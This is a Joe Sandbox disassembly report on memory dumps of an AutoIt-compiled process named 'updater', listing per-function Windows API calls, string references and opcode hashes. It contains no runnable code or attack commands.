Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 6a8441023d4cbc5d0fb31c7753547c95621da0977526e444785cf16e89ae6b3b
Instruction ID: 8d56f31361a7f0fa1db97a3084b71c41165c768e9f2fab94a4cfb83c8358340f
Opcode Fuzzy Hash: 6a8441023d4cbc5d0fb31c7753547c95621da0977526e444785cf16e89ae6b3b
Instruction Fuzzy Hash: 6BE0DF352102199FC310AF5AE800F9BF7E8AF94760F00842AFD49C7311DAB0ED008B91

Function 00C151E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00C15205

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8c8faea32e255d38516dda206230124e1389ea7122e423a3f0749fa4a38dd4db
Instruction ID: f6bbc172ae84338adab190a9075902da18a262f500909ee69468d1976378e445
Opcode Fuzzy Hash: 8c8faea32e255d38516dda206230124e1389ea7122e423a3f0749fa4a38dd4db
Instruction Fuzzy Hash: 00D01794160E09B8E81A0324CA0FFBE0208F3837C0FB4418A7122850C1A89258C9B421

Function 017B7195 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,017B89F7,00000000,017B8C10,?,?,00000000,00000000), ref: 017B71A8

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
Instruction ID: 6180a76dc0ac6930c78c3b1b906f20ed6a02a33641635a58a90783438812e37c
Opcode Fuzzy Hash: f1ffb4599b79f38fd8d7c650d754adac4e120045415bebdd127c198695e5f0c1
Instruction Fuzzy Hash: 80D05E6631E2543AA314915E2DC4EFB9AADCACA6A0F00407DB648C6341D3008C0693B1

Function 00C09369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C08FA7), ref: 00C09389

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: b59e3114b58773bf7923b89c082b397321185b87cfdd684b204b726a814d69b2
Instruction ID: a7890c4c306874e395ac327d12d4734d36b3942b9e4673017405b7a51070fe68
Opcode Fuzzy Hash: b59e3114b58773bf7923b89c082b397321185b87cfdd684b204b726a814d69b2
Instruction Fuzzy Hash: AFD05E322A050EABEF018EA4DC01FAE3B69EB04B01F408111FE15C50A0C775D835AB60

Function 00BF0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00BF0734

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c02b8424972667cfe7e84de52a8a7820f1457a2cfcb4aa76160fa56c03ae9ea9
Instruction ID: 6f0c3a665b25fd6259bcee966d62b483908a841294c14530f0d67f99623982b6
Opcode Fuzzy Hash: c02b8424972667cfe7e84de52a8a7820f1457a2cfcb4aa76160fa56c03ae9ea9
Instruction Fuzzy Hash: A4C04CF581010DDBCB15DBA0D988FFE7BBCBB04305F200055A205B3110D7749B448A71

Function 00BDA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00BDA35A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 411080da9bb042cd70e9711a67e5df263dbc63a5c424fa6dc8f84d2b9d7bf42c
Instruction ID: 5118e743ce7ede9e4c58d783be41fb12ca07588dea428a3d5e8589f4c741407f
Opcode Fuzzy Hash: 411080da9bb042cd70e9711a67e5df263dbc63a5c424fa6dc8f84d2b9d7bf42c
Instruction Fuzzy Hash: 65A0243007010CF7CF001F41FC0454C7F5CF7015507004010F50C00031C733541045C0

Function 017D5106 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17cf000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction ID: e88a238a6f2f42ffaaa6a41ad3a84b1608e07170df06012009e95163d6a8096f
Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
Instruction Fuzzy Hash: 2EF0A9323102498FEB62CE3DC8C0F25F7F8EF50670F2A14A9E6409B161E722EC44CA60

Function 017C32AD Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 00C33BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00C40980), ref: 00C33C65
IsWindowVisible.USER32(?), ref: 00C33C89

Strings

TABLEFT, xrefs: 00C33CC5
SETCURRENTSELECTION, xrefs: 00C33DF4
GETCURRENTCOL, xrefs: 00C33F66
EDITPASTE, xrefs: 00C33F9D
SELECTSTRING, xrefs: 00C33E44
ISCHECKED, xrefs: 00C33E77
ISVISIBLE, xrefs: 00C33C75
GETLINECOUNT, xrefs: 00C33F04
GETCURRENTLINE, xrefs: 00C33F2B
SHOWDROPDOWN, xrefs: 00C33D1E
CURRENTTAB, xrefs: 00C33CFB
HIDEDROPDOWN, xrefs: 00C33D3E
TABRIGHT, xrefs: 00C33CDB
UNCHECK, xrefs: 00C33EC1
GETSELECTED, xrefs: 00C33EE1
SENDCOMMANDID, xrefs: 00C34018
CHECK, xrefs: 00C33EAB
ISENABLED, xrefs: 00C33CA9
GETLINE, xrefs: 00C33FD9
FINDSTRING, xrefs: 00C33DB4
ADDSTRING, xrefs: 00C33D54
GETCURRENTSELECTION, xrefs: 00C33E21
DELSTRING, xrefs: 00C33D87

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: da68c271291b747b9ba453ec1029737cba7c6ffbea4866540de0a643a6e7ce1c
Instruction ID: 5510d4b0cc2e434760465e817cdb4e960b40213b47fe6f2092a68a2f01f4fb89
Opcode Fuzzy Hash: da68c271291b747b9ba453ec1029737cba7c6ffbea4866540de0a643a6e7ce1c
Instruction Fuzzy Hash: 45D170302242418BCB14EF50C491BBAB7E2EF94354F1044A9F9965B3E3DB31EE4ACB42

Function 00C3ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C3AC55
GetSysColorBrush.USER32(0000000F), ref: 00C3AC86
GetSysColor.USER32(0000000F), ref: 00C3AC92
SetBkColor.GDI32(?,000000FF), ref: 00C3ACAC
SelectObject.GDI32(?,?), ref: 00C3ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00C3ACE6
GetSysColor.USER32(00000010), ref: 00C3ACEE
CreateSolidBrush.GDI32(00000000), ref: 00C3ACF5
FrameRect.USER32(?,?,00000000), ref: 00C3AD04
DeleteObject.GDI32(00000000), ref: 00C3AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00C3AD56
FillRect.USER32(?,?,?), ref: 00C3AD88
GetWindowLongW.USER32(?,000000F0), ref: 00C3ADB3

Part of subcall function 00C3AF18: GetSysColor.USER32(00000012), ref: 00C3AF51
Part of subcall function 00C3AF18: SetTextColor.GDI32(?,?), ref: 00C3AF55
Part of subcall function 00C3AF18: GetSysColorBrush.USER32(0000000F), ref: 00C3AF6B
Part of subcall function 00C3AF18: GetSysColor.USER32(0000000F), ref: 00C3AF76
Part of subcall function 00C3AF18: GetSysColor.USER32(00000011), ref: 00C3AF93
Part of subcall function 00C3AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C3AFA1
Part of subcall function 00C3AF18: SelectObject.GDI32(?,00000000), ref: 00C3AFB2
Part of subcall function 00C3AF18: SetBkColor.GDI32(?,00000000), ref: 00C3AFBB
Part of subcall function 00C3AF18: SelectObject.GDI32(?,?), ref: 00C3AFC8
Part of subcall function 00C3AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00C3AFE7
Part of subcall function 00C3AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C3AFFE
Part of subcall function 00C3AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00C3B013

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 21a10ff909a757aa3c4d35111b081f1998b4b5ffc13c5cc18710857d74f4ed20
Instruction ID: 051ded3e99df5b0b088337eb2ad8b7bca82a96eb90fa4658c6a599579832d3bc
Opcode Fuzzy Hash: 21a10ff909a757aa3c4d35111b081f1998b4b5ffc13c5cc18710857d74f4ed20
Instruction Fuzzy Hash: 86A18976058301AFD7119F64DC08B6FBBA9FF89321F200A1DFAA2961A0D731D954CF92

Function 00BB2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00BB3072
DeleteObject.GDI32(00000000), ref: 00BB30B8
DeleteObject.GDI32(00000000), ref: 00BB30C3
DestroyIcon.USER32(00000000,?,?,?), ref: 00BB30CE
DestroyWindow.USER32(00000000,?,?,?), ref: 00BB30D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 00BEC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BEC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BECBDE

Part of subcall function 00BB1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB2412,?,00000000,?,?,?,?,00BB1AA7,00000000,?), ref: 00BB1F76

SendMessageW.USER32(?,00001053), ref: 00BECC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BECC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BECC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00BECC53

Strings

0, xrefs: 00BECA72

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0fe85bd3c552c814aae7b6fd05544b44f01bf478ede35b5ccc42451d6dd6ea6c
Instruction ID: c3bc796227fd4566f3a8ddb0cdda69a4b3bedc8fd8d466c7e5773707399f9a7c
Opcode Fuzzy Hash: 0fe85bd3c552c814aae7b6fd05544b44f01bf478ede35b5ccc42451d6dd6ea6c
Instruction Fuzzy Hash: 05127834604281EFDB25DF25C884BB9BBE1FF09700F6445A9E999CB262C771ED42CB91

Function 00BC27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FE6: std::exception::exception.LIBCMT ref: 00BD101C
Part of subcall function 00BD0FE6: __CxxThrowException@8.LIBCMT ref: 00BD1031

__wcsnicmp.LIBCMT ref: 00BC286A
__wcsnicmp.LIBCMT ref: 00BC287E
__wcsnicmp.LIBCMT ref: 00BC2896
__wcsnicmp.LIBCMT ref: 00BC28AE
__wcsnicmp.LIBCMT ref: 00BC28C6
__wcsnicmp.LIBCMT ref: 00BC28DE
__wcsnicmp.LIBCMT ref: 00BC28F6
__wcsnicmp.LIBCMT ref: 00BC290A
__wcsnicmp.LIBCMT ref: 00BC2948
__wcsnicmp.LIBCMT ref: 00BC295C
__wcsnicmp.LIBCMT ref: 00BC2970
__wcsnicmp.LIBCMT ref: 00BC2984

Strings

Bad directive syntax error, xrefs: 00BFFBD3, 00BFFBF0
', xrefs: 00BFFB9F
#comments-end, xrefs: 00BC296A
#notrayicon, xrefs: 00BC2878
#comments-start, xrefs: 00BC28F0, 00BC2942
#ce, xrefs: 00BC297E
#include-once, xrefs: 00BC28C0
#cs, xrefs: 00BC2904, 00BC2956
#requireadmin, xrefs: 00BC2890
Unterminated group of comments, xrefs: 00BFFCFA
", xrefs: 00BFFB89
#include, xrefs: 00BC28D8
#pragma compile, xrefs: 00BC2864
#OnAutoItStartRegister, xrefs: 00BC28A8
Cannot parse #include, xrefs: 00BFFCE5

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 2f92cd34e3308c9d3bc35e1a2cbce7a776a3876196e48dd7e0ec6730dc249916
Instruction ID: 87a5f18b287651ef73ad2d8a58e7f6794f6a6f6acc02d20aa888ca279d3bcd2d
Opcode Fuzzy Hash: 2f92cd34e3308c9d3bc35e1a2cbce7a776a3876196e48dd7e0ec6730dc249916
Instruction Fuzzy Hash: 2EA1A070A4020ABBCB20AF64DC92FBE77E4FF45740F1000ADF905AB292EBB19A55D751

Function 00C27B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C27BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C27C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C27CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C27CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C27D1D
GetClientRect.USER32(00000000,?), ref: 00C27D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C27D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C27D7C
GetStockObject.GDI32(00000011), ref: 00C27D8C
SelectObject.GDI32(00000000,00000000), ref: 00C27D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C27DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C27DA9
DeleteDC.GDI32(00000000), ref: 00C27DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C27DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C27DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C27E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C27E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C27E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C27E85
GetStockObject.GDI32(00000011), ref: 00C27E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C27E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C27EA5

Strings

DISPLAY, xrefs: 00C27D72
msctls_progress32, xrefs: 00C27E26
AutoIt v3, xrefs: 00C27D15
static, xrefs: 00C27D67, 00C27E7F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 907c1bc68cc136635f9ed766f2081c0c7ee0e352b3aa82fe1a036d69e5611c1f
Instruction ID: fc1ce8ce34a7564536f55c1f3bb1fa7a896e33b05042e6cb3b3f43547f0cc24f
Opcode Fuzzy Hash: 907c1bc68cc136635f9ed766f2081c0c7ee0e352b3aa82fe1a036d69e5611c1f
Instruction Fuzzy Hash: F0A16FB5A40619BFEB14DBA4DC4AFAE7BB9FB05710F104254FA15A72E1CB70AD40CB60

Function 00C1B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1B361
GetDriveTypeW.KERNEL32(?,00C42C4C,?,\\.\,00C40980), ref: 00C1B43E
SetErrorMode.KERNEL32(00000000,00C42C4C,?,\\.\,00C40980), ref: 00C1B59C

Strings

iSCSI, xrefs: 00C1B541
Removable, xrefs: 00C1B490
Fixed, xrefs: 00C1B486
RAMDisk, xrefs: 00C1B468
FileBackedVirtual, xrefs: 00C1B56B
Virtual, xrefs: 00C1B564
1394, xrefs: 00C1B51E
SCSI, xrefs: 00C1B509
\\.\, xrefs: 00C1B3B3
ATAPI, xrefs: 00C1B510
SSA, xrefs: 00C1B525
USB, xrefs: 00C1B533
SSD, xrefs: 00C1B4C9
MMC, xrefs: 00C1B55D
RAID, xrefs: 00C1B53A
CDROM, xrefs: 00C1B472
SATA, xrefs: 00C1B54F
ATA, xrefs: 00C1B517
Network, xrefs: 00C1B47C
PhysicalDrive, xrefs: 00C1B3EA
Fibre, xrefs: 00C1B52C
SAS, xrefs: 00C1B548
Unknown, xrefs: 00C1B45E, 00C1B502

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 07141cb65abbf66d47f803ff9617a3627fc7a71a83a5a75143893b4d5f78bccd
Instruction ID: 93c6b6915dab12097fe1f266e4f91022c020d2286ed441790cf98f065f275b64
Opcode Fuzzy Hash: 07141cb65abbf66d47f803ff9617a3627fc7a71a83a5a75143893b4d5f78bccd
Instruction Fuzzy Hash: 3751A434B40209EBCB14DB21C982AFD77E2BB4A340B648065F416E7291DB71AEC1FF51

Function 00C3A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C3A0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C3A1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 00C3A1CC

Strings

0, xrefs: 00C3A209

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 90945b2564a887bd0c0d51e925927b3ca8a32caa3b629badc57cc3f1ace1ee45
Instruction ID: a50cd7768ac87ff5aebf40cd4ebe89dbe8f749f6b20b1423e514b112bbb2b374
Opcode Fuzzy Hash: 90945b2564a887bd0c0d51e925927b3ca8a32caa3b629badc57cc3f1ace1ee45
Instruction Fuzzy Hash: 6702FF30128701AFDB15CF14C849BAABBE4FF85314F04861DF9EA962B1C775DA60CB52

Function 017B9C45 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 017B9C4E

Part of subcall function 017B9C0D: GetProcAddress.KERNEL32(00000000), ref: 017B9C2B

Strings

